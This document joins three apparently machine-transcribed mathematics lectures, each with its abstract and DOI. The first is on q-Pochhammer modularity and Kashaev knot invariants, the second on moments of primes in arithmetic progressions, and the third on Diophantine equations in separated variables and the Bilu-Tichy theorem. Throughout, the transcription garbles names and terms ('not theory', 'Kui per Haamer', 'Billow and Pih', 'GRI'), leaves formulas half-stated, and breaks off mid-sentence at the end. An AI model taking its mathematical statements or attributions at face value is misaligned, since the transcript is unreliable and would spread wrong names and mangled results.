2019. This, the cube for a symbol at the golden ratio is bounded below by one and upper bounded by n. This was open. It's a question which was asked by at least means keep it from the fore. Okay, so when we started to study this function, so before we knew about so many of these works, we started, we were studying a paper by Zagier. That's the four, the force motivation. And in this paper, I will put this reference as I get 2010, he has a paper which is called quantum module forms in which he studies many functions. And there is a very funny function in there, which is related to not theory. So we don't know anything about not theory, but the function is not very complete. Well, it is not very complicated to write down. So we say it is also the cupola machine board is also a basic component in constructing quantum invariant quantum net invariant. And also not only for that. So Jones and for us, my name, which is associated with this in not series, the Kashi of invariance. So I won't try to draw a knot because this is not theory people. I would say miserably, but for also a knot is a diagram. Okay, with some crossing, it's a knot in three dimensions that you can represent it in two dimensions. It depends on some skills which I don't have here. And to a knot, okay, define the knot. When you draw it, you can, when you look at the diagram and the crossing and which brand, which part of the knot goes on to another, and you look at some combinatorics. And from this, you can construct some invariant. So Kashi of associates a function, which so we state two examples to show you what it looks like to make it a bit more concrete. So five one and five two are some knots. I can try to, maybe I can show them to you, but after the talk, because I need to find them on the, I didn't think of throwing, I'm sorry about this, which depends on the variable Q. And so for instance, in one of the most simple cases, the function is the following, with some from n from zero to infinity, the Kui per Haamer symbol modulus squared. Okay, so this is just, we take the product for any one equals one, the product is empty, in other words, you take all the, all the successive one minus Q to the i, modulus squared. Okay, so if Q is modulus then less than one, this of course diverges. If Q is modulus bigger than one, it also diverges, but when Q is modulus exactly one, the interesting case for us would be when Q is exponential of a rational X. So it's a root of unity. So when Q is a root of unity eventually this product will vanish. And so there's some extent for a trivial reason. So this, I will state another one because I will need it. It's to illustrate a later statement. So this one is a bit more complicated to write down, but it's to show you that sometimes the sounds are not always positive. Okay, Q bar n times modulus Qm squared. So now it's a double sum. Okay, sorry. There's no X there, it's capital N. What is capital N? It's the denominator, it's the order of Q as a root of unity. Okay, so okay, maybe strictly, otherwise there is a definition drop. All right, so why was Kachev interested in this invariance is that it's easy to compute given the knot and when you look at some asymptotic expansion of this knot, they will tell you information about the knot itself, about the geometry of the knot. And this is something that interests not theory. But the reason why we're interested in this function is that, well, it's a very simple looking function to involve the polymer symbol. And there are many things that we still don't quite know about this function. So here's a statement. It's called the volume conjecture, but it's actually a theorem in, it's not a theorem, still. It's a theorem in some cases. And the cases that I'll talk about today, it's a theorem. But for generic knot, it's still wide open and not theory people are very, it's an important conjecture, wide open conjecture. So when you go, when you look at the first truth of unity, and you let the order tend to infinity, then they expect that for any such invariant constructed from the knot, and especially the two that I wrote above, there will be an expansion like this. So it will be exponential in n with a CK is some geometric invariant, you think the knot and divided by 2 pi. So it's some constant. Which has a geometric meaning that I want to discuss today. Okay. But then, so this doesn't tell you what happens for other roots of unity. And this is one of the first question which motivated us. So very happy to try to understand this. So you let an irrational be given, it will be between zero and one. Maybe this. And, okay, I will write what will come here afterwards. But what we want to know is what's the size of J for E of X for other kind of rationales. And we can answer this question under, so a generalization of this theorem, which is a theorem of, I wish to take the names afterwards. Understand and Hansen, in the case of four one, we can generalize this statement for other rational functions. So this simple looking function from before, when you evaluate it as a at other rational, it will take the following form. Of course, there is a specific constant here, plus little of one times the quantity which will depend very simply on the on X, simply, yes and no, it's the continuous fraction expansion of X. And so this, if you use a classical notation for the continuous fraction expansion, R is the length. And this asymptotic formula is as the mean value of the AI tends to infinity. If you give you a sequence of rational numbers with their, the mean value of their coefficients standing to infinity, you will get an asymptotic formula for the log of the J invariant, for this case, for the not just not. And so we are very lucky here because this is typically the case. If you take one over N, it will, you obtain back this statement, but this in fact holds for many other rational numbers and actually almost all in a certain sense. That's a corollary. As Q tends to infinity for proportion one plus little of one of rationals. X with denominator, I was okay, I can, okay, I won't be using Q for the denominator, I need to stop doing this. Of denominator less than Q. So you, when you average over all rationals less than, denominator less than Q, when you pick one at random, then for almost all of them, you have the asymptotic formula that this thing is exponential of, so what I wrote before, but it turns out that, that for almost all rational, there is a simple low of large numbers. Well, okay, simple to state, but to prove it, you need to work a bit harder. So we obtained a low of large numbers with the sum of the continuous fraction digits, and from this you can immediately deduce. From this end of previous theorem, you can immediately deduce this statement. So it's a form of low of large numbers for the log of the J invariant introsional numbers. So you can ask about this condition, is it necessary? What? And we're so very happy because Christophe and Benz, Christophe Eisleiter and Benz Borda earlier this year, they obtained a very nice statement, which I'm going to state now. So the condition, this condition is actually necessary because of the following theorem of that, so you take one example of a number of which, a very simple example, the simplest example of a number for which the average doesn't go to infinity is when you take all the a i equal to one. And so if you fix for any n x being the rational with all the numbers equal to one, and I will say more about what they can do and what else they can do. So this is a question of two B-Shibonacci numbers. And for these numbers, so this depends on n, then the J function grows exponentially exactly like before, but now the constant is different. So this is the same sum, the sum of the a i, but now the constant is not the same, the constant c is 1.1 something, at least, well numerically, they show that numerically it seems that the function is like this. Maybe they have some proof that the first digits are this, but maybe Benz cannot surface around, but they show that this constant is different than the one from the almost all results above. So the result is much more general and in particular it works for all quadratic rational. So when the expansion is periodic, they can obtain this formula and the constant is not always the same as before. More general. X with quadratic. So now I'll explain a bit why all of a sudden we were talking about this pochameric symbol and then we got into a constant attraction expansion. So before this, maybe I can talk for a few instance and ask if there are any questions. There seems to be one. No, that was on the rule. Okay. There are no questions. There's no question at the moment in the chat. So maybe someone will arise questions. Okay. Seems not the case. So please. Okay, continue. So why is the continued fraction expansion relevant here? Okay. Continue traction expansion. So that's because of the conjecture by the game who observed numerically the following. So you let H of X be, so I will state it only for the variant that I mentioned before, H of X be the log J. See everything happens inside the log. So let's take the log. Leg log J of that function from before at E of X minus log J, same thing as before at E of 1 over X. Then this function, which is defined on Q, is extends to A to A. A nice function of X in R star. So what I mean by nice is, well, not very clearly, the best way I can illustrate this is by showing you a picture. So this is the newspaper, quantum radioforms on 2018. It has lots of 17 pages, but still has a lot of stuff. And he has the following two graphics. So this is a log of the function that we had, plotted at rational numbers. You can see the size grows at the denominator. And then it doesn't look so regular. But if you take the difference between the difference that I just wrote, you obtain this function, which is at least much nicer looking. It's not very clear what we conjecture, but by zooming in at a rational, we see that it has some jumps at rational. So certainly we don't expect it to be continuous. And at irrational numbers, so 1 over phi is here, the golden ratio. And you see, well, okay, it looks continuous. It's not so, doesn't look at all differentiable, but at least we can imagine that the function has a limit. The limit is close to 1.1. And this is related to the values that I showed you before. So let's see, sorry, this one. So let's see. h of X, it looks continuous near the golden ratio or the inverse of the golden ratio. And h at the golden ratio looks close to 1.1. And this explains, this would explain the theorem that I showed you before, the theorem AB. Okay, let me call this one the generic theorem. And secondly, let me get back to this function. You see, it goes to infinity. And it seems to go to infinity like 1 over X, it seems to go like the constant that I showed you before divided by X. As X goes to zero plus. And this would explain the generic theorem. So sorry, sorry for this. So it would explain the theorem that I called the generic theorem. Why? Well, this is because when you start with evaluating the function at a certain rational, when you replace X by 1 over X, because this is one periodic, you at each time you apply, you replace a continued fraction. Oops, sorry, I should take the log. You replace the continued fraction. So say this is X. I'll get h of X plus. So log J of 1 over X, but 1 over X, what do you do? 1 is just taking away the first coefficient for 1, 0 of E of 0, A2, AR. So if the first coefficient is big, it means that X is very small. And then this will look like C4, 1 times A1. And then when you iterate, you get C4, 1 times A2. Well, of course, these numbers have to be big for this to make sense. And we can only prove this when the average goes to infinity. Okay, yeah, maybe you can keep this section. Okay, so I have a little time to explain to you. Yeah, still have maybe 15 minutes. So I will set you what happens inside the, well, what is the main theorem that is driving everything. So we don't have this conjecture. If we had this conjecture, things would be much easier and also with this information. But we get around this conjecture. By proving two theorems, which are modularity looking, the modularity relation, much like the one I wrote before for eta, let me go back to it for an instant. Much like this one, but having to do with the Pochamer symbol. So the main theorem is that, so there are two. If I give you Q for gamma in SL2z, then the function which 2x and n associates E of x over 24. So this is in Q cross natural numbers. Well, actually cross. So let's see 0, denominator of x minus 1, because then it vanishes afterwards. Let me see. So E of x, so then, so this function, which is interesting for this value, x is rational and n varies between 0 and the denominator of x minus 1 satisfies, satisfies, satisfies a transformation formula. Which, maybe I can show you, show it to you if you want, but it will take some time. So I will concentrate first of this, of this informal description. It's a formula which relates x, which sends x to gamma x like modular iteration, and it sends n to, let's state it like this, yes, it sends n to the floor part of n divided by denominator of x times the denominator of gamma x. And this is a number between 0 and the denominator of gamma x. And this formula is, is exact. 0 term depends holomorphically on the following, on the, the fractional part of this number. So I have to explain to you what I mean by this. And yes, maybe I have time. It will take, I think, some five minutes more to explain the full statement of this theorem. So the first part, the formula that we have, I can show, can show it to you. Actually, I'm wondering, okay, it takes some notation, so more precisely. But the point, there is a point I want to make in this formula. And to make the point, I need to, to actually show the formula, but the formula is not very, not particularly good looking. So to state it, I need to, okay, x as a rational and gamma of x. Here is gamma of x. You can express it using nd on this, but first it will be h over k. Then for one less than r, less than k. If you let l to be the floor part that I wrote before, and lambda to be the fractional part that I wrote before, if you take the quotient between these two things, then this will be, this will be an expo, we can express this exactly as some of many terms. There is the first one which will be maybe ring a bell for people to study cotangent sum. So this is a dedicant sum plus pi i over four plus half log of k over d. I will explain each term. Plus k over q d times something, some function which is related to the logarithm evaluated at this number between zero and one plus nr term which depends on r, lambda, and d over k. The main point is that this term is holomorphic. It's a function which depends on l on lambda. It has an expression depending on lambda which makes it extendable to a holomorphic function. In lambda, so in this set, whatever, it's some other set, more general than this one. And this came as a surprise because all these are finite products. So maybe it doesn't come immediately as a surprise that such a formula exists because when you take out going to infinity, if you could, you would obtain the data kind, the eta function that I wrote before. And the eta function is a modular form. So you might expect something like this to exist. But this is not the infinite product. It's a finite product. And even by taking finite products, you can still, you have still a formula which is useful. It's useful for us. And this is relevant. It's relevant for us when the denominator of x is bounded. This is a case when we can control the error term. And there is a second important agreement that I want to mention in the previous theorem, which is a second relation formula. Now, okay, I won't state it, but there is a second second reciprocity formula. Okay, modularity, sorry, modularity formula, second modularity formula, which relates now it's a bit. There is another layer of complication coming from the fact that it doesn't relate x with gamma x or one over x is going to relate the gamma x bar, which is when x you write it as a irreducible fraction, x bar, which be each you inverse the numerator modulo the denominator. Of course, this depends. This is only defined modulo k. So we take fraction upon. There's a formula which relates this. And basically, it means that when you apply, it allows you to take away not the first coefficient when you is making UK algorithm, but the last coefficient. This transformation going from x to x bar is equivalent to reading the continuous fraction expansion in the reverse order. And there is a reciprocity formula, which relates these two for the Q-PoH symbol. And it's useful for us. So I'm going to lay a bit to make the point more clear. It's useful for us when the denominator of x goes to infinity. So it's actually depends on the way you stated it. But we do stated when which makes it useful when the denominator, the denominator stands to infinity. And this is precisely the complementary, the complementary case of the previous one. So if we could get rid of this condition, we would be getting very close to the guess conjecture. We cannot. We're not able to right now. But by proving this complementary modulity formula, which has a lot of disadvantages, but it has the one big advantage that it's useful as soon as the denominator goes to infinity. And by combining the two, we can successfully iterate the formula. And maybe I can finish with the last remark that in this formula, in the formula two, there are some peculiar objects that pop up, which are the following. It's a cotangent sum. So let me say, okay, n, k bar over h maybe. Oh, sorry. Okay, okay, sorry. I confused between the button for go back page and okay cotangent of pi n h bar over k. h inverse over k. This function is one periodic. So this makes sense. But you're okay. Times n over k. And if there was, if the sum was over all, residue, non-zero, residue, modulo k, this would be a cotangent sum. But in this formula, it turns out that very naturally, we didn't, we certainly didn't call for it, that this sum appears when r is restricted to be something else to the k. So it's a partial cotangent sum. And this, okay, we struggled for a long time with this kind of object. It has some reciprocity, but it's not, it's not exact. So, okay, there is something, there was something new going on in this formula that we didn't expect. So if you stumble on something like this, maybe take a look at this pair of paper or Loubinski's paper and let's save you some headaches. And so, yeah, okay, so you can say more about some elements of the proof if someone asked, but otherwise I stop here. Thank you for your attention. Yeah, Saris, thank you very much for this very nice Blackboard talk. So we could end this conference with a Blackboard talk. Of course, in auditorium A1 in Exier, we have much more Blackboards. We have three big ones and some smaller ones. Here is just one Blackboard, but it has one advantage compared to a real Blackboard one. We can go back to any Blackboard. So I have a small question. You introduced this geometric constants somewhere in the first third of the talk. Could you say some words on the geometric interpretation of that constant? Yes, so maybe for this I can find a picture of the knot. So I need to find a picture of the knot. Let me see if it's in the gift paper. Because these interpretation as knots would be really very instructive. Yeah, so let me get right back with the screenshot. I need to find a picture of the 4-1 knot. But if it takes too long, we should postpone it to discussion room or something like that. It's okay, I found it. It's actually on Wikipedia. It wasn't difficult. Okay, so let me see. Yes, so this is the figure 8 knot. This is the 4-1 knot that I was talking about. And when you consider the complement of the knot, so everywhere in the space except inside, it turns out there is a theorem of... Okay, I forgot his name. Okay, that's embarrassing. He's one of the biggest people in this thing. You can put a hyperbolic structure, a metric, on the complement of the space, which makes it a hyperbolic space and it has finite volume. And the constant is the volume of the space. Maybe it's you to make my... Sorry? Maybe it's you to make my own. I don't know, but it could be. No? Okay. Yeah, I don't remember something. I'm sorry. It's not... It's not... It's not... It's not embarrassing. Yes, okay, so he showed that you can decompose the complement space into a simpler hyperbolic space. And when you compute the volume, it's interesting, intrinsic quantity, and the constant is the volume of that. Okay, so thank you for this very nice explanation. Are there other questions? Short ones? Long ones are postponed to the discussion rooms. Yeah, Benze is typing a question. Maybe it will come soon. Yeah, here is... Can you read the question? Yeah, so is it conjecture that the guess function is continuous at every rational? And I believe so, yes. And it certainly looks so numerically. Of course, you have to... Of the numerical, so I can show you why. This would be a funny explanation. And there is a graph from this paper. So this is what you happen when you compare j of x with j of 1 over x. And this is what you happen when you compare j of x bar with j of 1 over x bar. So it looks much or less the same. But this function takes actually... It goes to plus and minus infinity at the neighborhood of any rational number. So it looks to be nice and continuous, but when you zoom in, you remark that it's not very nice at all. So you need to be aware of the conjecture, but I believe that h of x is continuous at every rational.
|
This talk will report on a work with S. Bettin (University of Genova) in which we obtained exact modularity relations for the q-Pochhammer symbol, which is a finite version of the Dedekind eta function. We will overview some of their useful aspects and applications, in particular to the value distribution of a certain knot invariants, the Kashaev invariants, constructed with q-Pochhammer symbols.
|
10.5446/53731 (DOI)
|
So, it's a pleasure to give a talk. Of course, I would have preferred to be in Lumini with all of you, but thank you very much for the organizer, Robert and Joelle. Okay, so my talk will be the second part of the talk of Daniel Chirilly. So it's about higher moments of primes in interval and in arithmetic progressions. So I will focus myself on arithmetical progression. So I will recall the notation. So I will text my summation of prime power with some weights. So remember, I will take the weight 1 over square root of n and then also weight with the eta function. So you can imagine eta as a smooth function where the value is concentrated around zero. So of course, what we expect is the same summation with n co-prime to q with a factor 1 over cq. So my talk will focus on the prove as the asymptotic study of moments where we take the sum over a co-prime to q. So q is fixed larger than 3. Of course, because there is no sense when q is 2. So the main thing to remember is that q is fixed so that we can have a mean value over q. But when you look at such a product, you express this summation with a character with orthogonality and we developed and then we have such expression. So this means that our moments is a link to the summation of our character. So of n characters which are not principal. So chi zero q is the principal character modulus q. But the product is the principal character. So it's an easy exercise. So the point is that we need to evaluate this sum when chi is not principal. So the first step of our proof is to prove an explicit formula. So we take a data to be a differential function which is even and which satisfies such properties. So eta and the derivative of eta is small and t tends to infinity. And also that is very important. So the Fourier transform is positive and is not too big. But the point here is the positivity. So if you need to remember one point in my talk, it's the positivity of the Fourier transform. So then one can prove such explicit formula. So it's not far from the classical explicit formula that we know. And here's the summation. It's over zero of the zeta Riemann function. So I take only the non-trivial zero and I wrote the zero as a one half plus i gamma. So this means that I want to assume the GRH. So if I assume the Riemann hypothesis for all L function, of course gamma is the number is real. And then we can write this formula. But it's also okay when the GRH is not true. So this is our first step. So we will replace this summation by this term with the non-trivial zero of Ls of chi. So then we can introduce a probabilistic model. So we take x, uniform random variable on zero one. And we define z index gamma, such as the exponential of 2 pi i gamma x. And then for n larger than 2, we define such a summation. So then we see that the expectation of the product of z gamma random variables is one if the sum of the gamma is zero and is zero if not. Okay, so in particular, this implies that the formula for the expectation of the random variable h of n q eta. And so this is a very important formula because one can show that such an expression is limiting the distribution of m n. Okay. So the second step is that we want to study moment of moment. So this is the second key step in our proof is that we want to study the moment of the moment over a. So we take phi l one function even classical and we have this formula. So this means that if we take the moment of n, then we can express it in function of the zero of l function. So you see, so chi. It will be n time s character here. So we can indexes. We can index the character like in a matrix. Then they all need to be different from the principal character and the product of an array is a principal. And then for each character, we have zero of the l function associated to the character and then we have a double summation over the character and then over the zero associated to this character. Then I have written it out of the gamma as a product of all the foyer transform of it are in gamma of 2 pi and I have written also the sum of over all the zero time one of a 2 pi. I wrote it sigma index gamma. So imagine if we take a t in large, we replace this moment of moment by a summation over s time n character summation over s time n zero. So take s equal one, the previous formula and take t tends to infinity. Then we will find back smaller mn q theta, the mean value or the expectation of the random variable of the model. So now I will study the center moment here. So I will not take the empirical expectation, but I will take the expectation of the model. This is very important for technical reason. I don't know what would happen with the empirical expectation. So if we replace in this formula, all we know about this moment, we replace by the summation of the character over the zero. Then we have this formula. So I recall here the notation and here a new notation, capital delta index s is a formula s by a sum over a subset of one s is a coefficient minus one power s minus the cardinality of i times the Fourier transform of the fifth function times product over index mu that it doesn't belong to i and delta zero is a direct function. So I mean so if it's zero, it's one. And if it's not zero, it's zero. And one part is very important is that we can prove an inequality between this function and another function, a delta function, which is in fact the limit of this function when t tends to infinity. So it's a nice formula and I will show soon how to prove it. So in fact, the limit of the delta function when t tends to infinity is one. If the summation over all sigma mu is zero, one or all sigma mu is not zero. So this means that if there exists an index mu such that sigma mu is zero, then it's zero. And if not, we need to know if it's one. We need to check that the summation of sigma mu is one. Okay. So I wrote again as the same formula and I want to give you some idea of the proof. Very simple, but I think it's a nice result. So I wrote the case set is a set of mu such that sigma mu is not zero. So when we look at this function, in fact, it is a summation, Fourier transform of phi function taking t times the sum over not i, but over the k set, which is defined here, times the function who controls the fact that k is a subset of i. So it's one if k, it's included in i and zero otherwise. Then we can replace this expression in the definition of delta of s and we can have a we can factorize as this expression by this quantity which depends only on sigma. And then we have such a nice sum, which is zero, always zero. If k is not the set one dot dot s. So this means that this is we have zero if one of sigma mu is zero. And then if not, we have such an expression and then of course we see that if t tends to infinity, this is tends to zero except if this summation is zero. Okay, so this is the end of the proof. So I am aligned that the positivity condition is very important. And we compare of moments of moments to the moments of the model. This means that we have a very nice inequality such that to the moments times minus power s time n is bigger than this moment associated to the probabilistic model times an error term. And I wrote it again as a notation. Okay, so how to resume this party. This means that since to the positivity condition, we can prove a lower band of moments by the moment of the probabilistic model. It's a very nice result. It's a pity because we can prove the upper band, but it's a very nice result. And then now I will try to see how to estimate the moment associated to the probabilistic model. And then I would like to introduce the hypothesis LE. So LE is for linear independent. So hypothesis LE assumes that there is no non-privileged linear relation between zero of L function. When Chi is a character modulo q, you can assume also that the character is non-principled. It's a very, very powerful hypothesis. I mean, we have no clue how to prove it. There is no result. There is no intermediate result. So this means it's very powerful. So we would like to see why it can be useful for our problem. So take gamma 1, gamma n, the ordinate of non-privileged zero of the function of the L function. And if we assume a GRI and LI, then this relation implies that n is even, so it can be written as 2m. And there is elements that we can split in two parts, i1, im, j1, jm. And they are the element of set 1 to 2m. And the very important part is here. So we have a relation between gamma. So the ordinate of the one of the zero is the opposite of the ordinate of the other zero. So we have the sum of the gamma is zero. And then there is also a relation between the character. So this means that one of the characters is the conjugate of the other one. So I mean in such a linear relation for me is what I assume a trivial relation. Of course if gamma is the zero of the L function associated to a character, the opposite, I mean one of plus minus i gamma is again a zero, but the L function associated to the conjugate character. Okay. And then there is an easy consequences. So under LII hypothesis, the expectation of such a random variable, so with an odd exponent is zero. Why? Because if we look at the summation of all the zero, there is an odd number of zero. And it's not possible under LII. Okay. Okay. So the problem is that I said that hypothesis LII is very powerful. That means we don't want to assume such an hypothesis. We believe that it's true, but it's very strong. So we have to study such a condition. And we restrict our summation over zero set, satisfying LII conditions. That means as we have the positivity condition, we can restrict our sum over zero. Which satisfies some extra conditions. So we assume that our zero satisfies any condition. But I mean we don't need to assume LII hypothesis. We just restrict our set over such a zero. Then so we can introduce some combinatorial object. Let's take S be even easier. Because in the other case, the combinatorial aspect is much more complicated. So we introduce a set of involutions between the Cartesian product of 1 and 2R times 1 and n. And we assume there is no fixed point. We have such a relation between nuj and the major by p of nuj. Of course, for a set of zero on the character, such an inversion by can be not unique. But we will restrict on a set where it is unique. And one point is very important to study is that we will introduce the set capital J of mu nu depend of two index mu and nu between 1 and 2R. And then we define the set of small j. So we have this relation and this relation. So this means that this is the intersection of these two subsets. We need to see what is satisfied. So I begin by this set when nu equals mu. This means that you see you have zero coming from the same L function associated to a character of chi nu. And of course, we can gather the zero by two. We can group by two such that the sum of the zero, the sum of the ordinate of the zero, of the two zero is zero. So this means we need that cardinality to be even. Here, so it's a trivial relation. Of course, for mu specs, you have n index j and each subset here are djons. So there is no common element. So the sum of the cardinality is n. And if we have such, so this part means that if we can, for each mu, there exists a new function from mu such that such a set is non-empty. So we have such a relation. And then I will try to explain what happened. So I introduced some extra notation. The capital of theta is the product over all j in the set capital J mu nu. And of course, easy to check that the product, this product when mu equals mu, this product is the principal character. Okay. So what can prove that the main contribution comes from the subset of evolution in my set such that for each mu, there exists only one mu such that this set is non-empty, only one. And I will try to explain you why taking an example. So I take the example r equals, of course, r equals one is nearly trivial. So if we take the character and I wrote such a product, I have some relation between the product, the product of all mu of capital theta mu nu is the principal character. So we have four relations. And you see that in each product, we have the diagonal term, I mean mu equals mu. And this term is the principal character. So I mean we can delete it. And then we see that if we assume three relations, it's easy to get the fourth one. This means that we have three relations, but in one case, we have only two independent relations. The case is if we only assume that if we assume that the capital J of this index is empty sets. Then we only have two relations between the character. So capital theta one two equal capital theta three four equal the principal character. So this means that if we assume that for each mu, there is only one mu such that if we assume here this set is not empty, I mean it's not zero, but empty set, then we will have a minimum of relation. And I mean the less we have the relation, the larger is the contribution. So what we'll take, so of course if we assume, for example, that's a relation, so the index where the capital J set is non-empty is consecutive. So I mean, for example, two times mu minus one, also this is a two. Maybe I can. I can. This is a two. Okay. So if the index is a consecutive, then of course to have such a relation, so we have only our relation and then the number of the character is the FQ plus capital O of one power n minus one time R. Okay. We have our relation between, so we delete one factor FQ by relation. Okay. And then, so we take the subset of my evolution which satisfy my extra condition and then it's easy to see that we can express it at the power of mu of n such a sum and times the value of the two of moments of the normal law. And then we see that such a sum appears because the event n is congruent to m of q when a is among the ready residue, congruent to q is non-independent. Okay. So let's go back to our problem. So we have a summation. And in the summation, we will have this relation that I wrote previously. And then, so when we take the summation over such an ordinate of zero, I will have, so of course the ordinate can be, they can be summed with multiplicity. So I wrote the multiplicity and then I need to take a square for the multiplicity. So here the star is written here to say that we avoid multiplicity in this sum. And then what we observe is that this is larger than the sum with the multiplicity but without this factor. I mean it's equivalent to say that this square is larger than the star. So we use such inequality. And then the sum that we find here is around alpha of the square of 4-e-tonsum of eta, so I define, so I define here alpha of the square of the 4-e-tonsum. So now we can see that if you take all these results, you can easily deduce that the moment of probabilistic model is larger than the mu of 2r times the variance power r and the variance is defined here. So with mu of n, the constant here, and alpha times log q power n over pi q power n plus 1. And then we can also prove the same result for odd moment, much more difficult because you know the main contribution is difficult to define. So we have some constant here that is used to define the smaller ceta functions that we find here. But what we need to understand is that we have the variance power 2r plus 1 divided by 2, but times the small factor 1 over square root of 5q. So I mean it means that the odd moment is smaller. So now I switch, so we would like to say what gives the LI hypothesis. So I mean I don't need to assume this hypothesis to get the lower bound, but if I want to know what is the asymptotic size for the model, for the probabilistic model, it's not so easy because we have to sum over all chi which satisfy our relation, but we have the terms that we find for the lower bound is the real asymptotic size of our model. So this means that if we believe to LI, then we succeeded to prove the good lower bound for our moment. So of course in this estimate, we can prove some uniform estimate on n and on r and it's very useful to get some result, for example, to deduce some omega result on our moments. And also on the error term of the estimate that the size of eta xaq is estimated by the contribution of the principal character. So yeah, we also can prove some result when a equal one. Why? Because if a equal one, some value of the character is one, and then we don't need to have a moment of a summation of a, and we can prove the same kind of result, but with the combinatorial aspect, very, very much simpler. Okay, thank you for your attention. Yeah, so thank you very much for the presentation. Thanks. We have time for some short questions. I have seen Gerald Tenenbaum typing. Yes, the type is here on the chat. Can you read it? Question for Regis and Daniel, you restrict the analysis? Yeah, so I can read Gerald's question. So yeah, why are we respecting our sum over zero satisfying extra condition? We can get the good asymptotic. Well, I mean, when we look at the model, it's clear that if we assume hypothesis is Li, we will have the expected size. But so when we look at some depending of Li, I will find it soon. Okay. Yeah, when we look at this summation, you see that our lower bounds assume that this term is very small if the sum is not zero. This means that we need to believe a very strong Li hypothesis because we need to believe that such a sum is not close to zero. We believe that when it's zero, we know how to explain it, but we need to believe that when it's not zero, it's not close to zero. So it's much more stronger. Maybe there is a short comment of Daniel, which explains what you have said. Yes, what Daniel said is that for the probabilistic model, if we assume Li hypothesis, there is no, the set that we don't take care is empty.
|
This is the second part of the talk of Daniel Fiorilli. We will explain the proofs of our theorem about the moments of moments of primes in arithmetic progressions.
|
10.5446/53734 (DOI)
|
Thank you very much. Greetings to everyone. First of all, I would like to thank you very much the organizers to offer us this possibility. Of course, we all know that the best way to have a mass conference is to meet together in some place like Marseille. The second best thing is when this is not possible to have a virtual conference. So thank you very much for making the effort for this. So the plan of the talk is after a short introduction, I will say a few words about the BILUTI theorem and then I will address three topics in which with some co-authors I have a few results concerning the Ophantine equation in separated variables. Not all of them are connected to the BILUTI theorem. There are also some results which will be effective results. So first of all, if you take the Ophantine equation of the shape fxy equals zero, where fxy is a polynomial with rational coefficients, then in principle, the main question may be how this or when this equation may have a finite or infinitely many solutions. And of course, we know that if fxy is irreducible over q, but it is not absolutely irreducible, so it's not irreducible, let's say over c, then fxy equals zero has finitely many rational solutions. Denoting by G the genus and by D the number of points at infinity of the plane curve fxy equals zero, in 1929 Z-girl answered this question quite completely. In principle, his result says that if fxy is absolutely irreducible and G is larger or equal to one or D is larger equal to three, then one has only finitely many solutions. So Z-girl's result is very helpful when the polynomials are given explicitly or when they are of a very special form, but in principle it was for a long time a question whether we can describe all the pairs of polynomials f and G for which fxy equals G y, which is a special case of the previous shown equation, the case when the variables are separated in the left hand side y is on the right hand side, can we describe all the situations when this may have infinitely many solutions. In the type of equations with separated variables enter many important special cases, many important classes of the of anti-equations like super elliptic equations, hyper elliptic equations, Schindsel-Tiedemann equation, power values in arithmetic progressions or power values of the sum of case power, equal values of lecunary polynomials and several other classical and important the of anti-questions. Now the question of describing all pairs of polynomials such that the equation fx equals G y has infinitely many solutions, has been solved by Billow and Pih, in principle this is a widely known and appreciated theorem which became a very important tool in the of anti-number theory. They proved that if f and G are polynomials with rational coefficients which are non-constant, then the following two statements are equivalent. Equation 2 has infinitely many solutions in rational numbers with bounded denominator, in principle it's a kind of generalization of the of the searching for integer solutions. So this statement is equivalent to the fact that f is composed of three functions, three polynomials and G is composed again of three polynomials where the inner polynomials are linear polynomials, the middle polynomials form a so-called standard pair which on the next slide I will show how they look like and phi is just a polynomial with rational coefficients and it also has to be assumed that the equation fx equals G y does have infinitely many solutions in rational sweet bounded denominator. So in principle this is a very concise description of all the cases in which it is possible that this equation does have infinitely many solutions and there are the possible pairs for G and f or f and G of course in perpetuating the order doesn't make any difference. So there are five types of polynomials. The first type of polynomials look like x to the power q and in this product afterwards the second type is x squared and alpha x squared plus beta times vx squared where here alpha beta are nonzero rational numbers and the third types of and fourth type of pairs are defined using the big sum polynomials and finally there is a fifth pair where there are not many restrictions of the parameters. So these are the possibilities. Since this is a very concise and precise description of all the situations and there might be infinitely many solutions the ability to CRM became a widely used tool for proving finiteness of number of solutions in the case of the ofantian equations. I cannot list all or nearly all or not even the all the important results where the ability CRM has been used but I just show a few instances of the use of them maybe some of which I knew without searching for them. So Peter Pinter and Schindsel and later Schindsel alone applied the theory for separable equations in trinomials. Stoll and he investigated the problem for general makes and the crutch to polynomials. Bill Brinsock in Scherhofer Pinter and he used it for Bernoulli polynomials, Kresho for lacunary polynomials, Dubis Ketten Kresho for truncated binomial powers, Rokowski for polynomial values of power sums and Kulkarnian for polynomial values of products of consecutive numbers. So to start to present some results first of all let us define the sum of products of consecutive integers in principle this is a polynomial which is defined by the sum of the product of terms like x plus j so if we start to look at the first such polynomial f0 of x that's nothing else just x. f1 of x is x plus x times x plus 1. f2 of x will be x plus x times x plus 1 plus x times x plus 1 times x plus 2 and so on. So in principle what is clear from the definition is nothing else that f of x is a monic polynomial. Then it has positive integer coefficients. Its degree is k plus 1 and well as we see it is also visible from this that 0 and minus 2 will be always the root of this polynomial. These polynomials first were introduced as far as I know by Kojula, Estroman, Tenghe who proved that the the of Fanta, who considered the the of Fanta equation fk of x equals y to the n and they proved effective finiteness result for that. They even solved completely the equation when one smaller or equal to k smaller or equal to n and to do so they needed a few more involved properties of these polynomials. So about the fk of x here are the first few polynomials and if k is larger or equal to 3 then all the roots of the polynomial fk of x are real and simple. So the only case when there is a double root is here in f2 of x. 0 is always a root and minus 2 is always a root of the polynomial and a more precise description of the root structure of fk of x is here. These are the intervals where fk of x does have a root. So in principle each root can be can be put in an interval of at length most well 1.5 but generally 1. So it is very well described where are the roots of this polynomial. Okay so for our generalization of the result of Hore-Gula instrument Tangae we needed some properties of the polynomials fk of x plus 1 and f derivative of fk derivative of x sorry from here the case missing. So if k is larger or equal to 3 then all the roots of fk of x plus 1 are real and simple. That's one property which we will use later. Minus 1 is always a root of the polynomial fk of x plus 1 for all k larger or equal to 2. Again for k larger or equal to 2 we can describe where the roots of this polynomial fk x plus 1 beside. One of them is in the interval minus k minus 1 minus k the next one in minus k minus k plus 1 and so on. At 2 minus 3 minus 2 and finally there is one root in the interval minus 0.50. So for k larger or equal to 3 if we consider the derivative of such a polynomial then we can denote the roots by alpha 1 alpha 2 and so on. All these roots are real and simple so it will have exactly k roots. If k is larger or equal to 6 then we can prove that fk derivative is 0 is positive, fk derivative in the value minus 1 gives a negative value and so on. And for k larger or equal to 13 we just have fk alpha 1 is larger than fk alpha 3 is larger than fk alpha 5 and fk alpha 2 is larger than fk alpha 4. These are properties which we needed in the proofs of our results. Among the first results I will mention that fk of x is in the composable. So let us see what we mean by a polynomial being in the composable. By the composition of a polynomial f of x over a field k we mean that it is written as a composite function of two polynomial functions. So it is of the form g1 of g2 of x 